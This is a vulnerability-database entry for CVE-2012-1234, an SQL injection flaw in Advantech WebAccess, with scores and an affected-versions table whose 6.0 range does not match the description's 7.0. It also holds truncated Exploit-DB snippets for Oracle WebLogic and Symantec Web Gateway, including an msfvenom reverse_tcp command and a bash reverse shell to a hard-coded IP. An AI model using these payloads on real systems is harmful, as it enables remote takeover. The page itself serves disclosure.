CVE-2012-1234
published 2012-02-21CVE-2012-1234: SQL injection vulnerability in Advantech/BroadWin WebAccess 7.0 allows remote authenticated users to execute arbitrary SQL commands via a malformed URL. NOTE…
PriorityP433medium6.5CVSS 2.0
AVNACLAuSCPIPAP
EPSS
1.16%
63.1th percentile
SQL injection vulnerability in Advantech/BroadWin WebAccess 7.0 allows remote authenticated users to execute arbitrary SQL commands via a malformed URL. NOTE: this vulnerability exists because of an incomplete fix for CVE-2012-0234.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| advantech | advantech_webaccess | <= 6.0 | — |
| advantech | advantech_webaccess | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
exploitdb·2019-04-30·CVSS 9.8
CVE-2019-2725 [CRITICAL] Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
---
#!/usr/bin/python
# Exploit Title: Oracle Weblogic Exploit CVE-2019-2725
# Date: 30/04/2019
# Exploit Author: Avinash Kumar Thapa
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html
# Version: Oracle WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0
# Tested on:
#OS: Windows 2012 R2 (Build 9600).
#Architecture : x64
#System Language : en_US
# CVE : CVE-2019-2725
# Script Usage:
# python exploit.py http://IP:PORT/_async/AsyncResponseServiceHttps
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1234 -f psh-cmd > exploit.ps1
# Add the powershell command in the variable
__author__ = "Avinash K
Exploit-DB
Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution
exploitdb·2012-05-26
CVE-2012-0297 Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution
Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion / Remote Code Execution
---
#!/usr/bin/python
# Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof of Concept
# Exploit requires no authentication, /tmp/networkScript is sudoable and apache writable.
# muts at offensive-security dot com
import socket
import base64
payload= '''echo '#!/bin/bash' > /tmp/networkScript; echo 'bash -i >& /dev/tcp/172.16.164.1/1234 0>&1' >> /tmp/networkScript;chmod 755 /tmp/networkScript; sudo /tmp/networkScript'''
payloadencoded=base64.encodestring(payload).replace("\n","")
taint="GET / HTTP/1.1\r\n\r\n" % payloadencoded
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect(("172.16.164.129", 80))
expl.send(taint)
expl.close()
trigger="GET /spywall/releasenotes.php?relfile
No writeups or analysis indexed.
2012-02-21
Published